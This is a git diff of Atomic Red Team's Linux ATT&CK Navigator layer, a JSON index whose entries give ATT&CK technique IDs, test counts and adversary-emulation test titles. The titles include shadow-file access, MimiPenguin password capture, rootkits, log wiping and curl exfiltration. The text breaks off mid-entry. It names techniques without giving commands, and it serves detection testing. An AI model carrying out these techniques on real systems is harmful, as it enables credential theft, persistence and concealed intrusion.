diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index f324b7d4f..a5006ce06 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Linux)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with sh on FreeBSD (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/master.passwd (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd,master.passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Find and dump sqlite databases (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1007","score":1,"enabled":true,"comment":"\n- System Service Discovery - systemctl/service\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":1,"enabled":true,"comment":"\n- System Network Configuration Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":6,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - netstat\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":2,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n- Pad Binary to Change Hash using truncate command - Linux/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as FreeBSD or Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":1,"enabled":true,"comment":"\n- linux rename /proc/pid/comm using prctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":1,"enabled":true,"comment":"\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":2,"enabled":true,"comment":"\n- rc.common\n- rc.local\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":8,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture FreeBSD using tshark or tcpdump\n- Packet Capture FreeBSD using /dev/bpfN with sudo\n- Filtered Packet Capture FreeBSD using /dev/bpfN with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl freebsd,linux or macos\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":3,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery FreeBSD, Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /etc/cron.d folder\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":6,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Logging sh history to syslog/messages\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":17,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Obfuscated command line scripts (freebsd)\n- Change login shell\n- Change login shell (freebsd)\n- Environment variable scripts\n- Environment variable scripts (freebsd)\n- Detecting pipe-to-shell\n- Detecting pipe-to-shell (freebsd)\n- Current kernel information enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts\n- Execute Python via Python executables\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":36,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":9,"enabled":true,"comment":"\n- rm -rf\n- rm -rf\n- Truncate system log files via truncate utility (freebsd)\n- Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)\n- Overwrite FreeBSD system log via echo utility\n- Delete system log files via unlink utility (freebsd)\n- Delete system journal logs via rm and journalctl utilities\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":16,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear sh history (rm)\n- Clear Bash history (echo)\n- Clear sh history (echo)\n- Clear Bash history (cat dev/null)\n- Clear sh history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear sh history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear sh history (truncate)\n- Clear history of a bunch of shells\n- Clear history of a bunch of shells (freebsd)\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n- Disable sh History Logging with SSH -T (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":5,"enabled":true,"comment":"\n- Delete a single file - FreeBSD/Linux/macOS\n- Delete an entire folder - FreeBSD/Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n- Delete Filesystem - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Linux\n- Copy and Modify Mailbox Data on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n- Stage data from Discovery.sh (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.003","score":6,"enabled":true,"comment":"\n- Create local account (Linux)\n- Create local account (FreeBSD)\n- Reactivate a locked/expired account (Linux)\n- Reactivate a locked/expired account (FreeBSD)\n- Login as nobody (Linux)\n- Login as nobody (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":8,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- FreeBSD VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on freebsd, macos and linux\n- Linux List Kernel Modules\n- FreeBSD List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":7,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Show if a user account has ever logged in remotely (freebsd)\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu\n- Tor Proxy Usage - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- SUDO Brute Force - Debian\n- SUDO Brute Force - Redhat\n- SUDO Brute Force - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":2,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n- SSH Credential Stuffing From FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":4,"enabled":true,"comment":"\n- X Windows Capture\n- X Windows Capture (freebsd)\n- Capture Linux Desktop using Import Tool\n- Capture Linux Desktop using Import Tool (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":1,"enabled":true,"comment":"\n- System Time Discovery in FreeBSD/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":2,"enabled":true,"comment":"\n- Base64 Encoded data.\n- Base64 Encoded data (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":2,"enabled":true,"comment":"\n- Network Share Discovery - linux\n- Network Share Discovery - FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a user account on a FreeBSD system\n- Create a new user in Linux with `root` UID and GID.\n- Create a new user in FreeBSD with `root` GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":2,"enabled":true,"comment":"\n- Active Directory Create Admin Account\n- Active Directory Create User Account (Non-elevated)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1140","score":8,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Base64 decoding with shell utilities (freebsd)\n- FreeBSD b64encode Shebang in CLI\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n- XOR decoding and command execution using Python\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - FreeBSD\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":2,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux\n- List Google Chromium Bookmark JSON Files on FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- chflags - Remove immutable file attribute\n- Chmod through c script\n- Chmod through c script (freebsd)\n- Chown through c script\n- Chown through c script (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (FreeBSD/Linux)\n- Encrypt files using 7z (FreeBSD/Linux)\n- Encrypt files using ccrypt (FreeBSD/Linux)\n- Encrypt files using openssl (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n- Detect Virtualization Environment (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":2,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n- Security Software Discovery - pgrep (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":9,"enabled":true,"comment":"\n- Restart System via `shutdown` - FreeBSD/macOS/Linux\n- Shutdown System via `shutdown` - FreeBSD/macOS/Linux\n- Restart System via `reboot` - FreeBSD/macOS/Linux\n- Shutdown System via `halt` - FreeBSD/Linux\n- Reboot System via `halt` - FreeBSD\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - FreeBSD/Linux\n- Reboot System via `poweroff` - FreeBSD\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":1,"enabled":true,"comment":"\n- Change User Password via passwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"comment":"\n- Create Systemd Service\n- Create SysV Service\n- Create Systemd Service file,  Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Add command to .shrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n- Create/Append to .bash_logout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"comment":"\n- Trap EXIT\n- Trap EXIT (freebsd)\n- Trap SIGINT\n- Trap SIGINT (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Make and modify binary from C source (freebsd)\n- Set a SetUID flag on file\n- Set a SetUID flag on file (freebsd)\n- Set a SetGID flag on file\n- Set a SetGID flag on file (freebsd)\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"comment":"\n- Sudo usage\n- Sudo usage (freebsd)\n- Unlimited sudo cache timeout\n- Unlimited sudo cache timeout (freebsd)\n- Disable tty_tickets for sudo caching\n- Disable tty_tickets for sudo caching (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":3,"enabled":true,"comment":"\n- Find AWS credentials\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"comment":"\n- Search Through Bash History\n- Search Through sh History\n","links":[{"label":"View 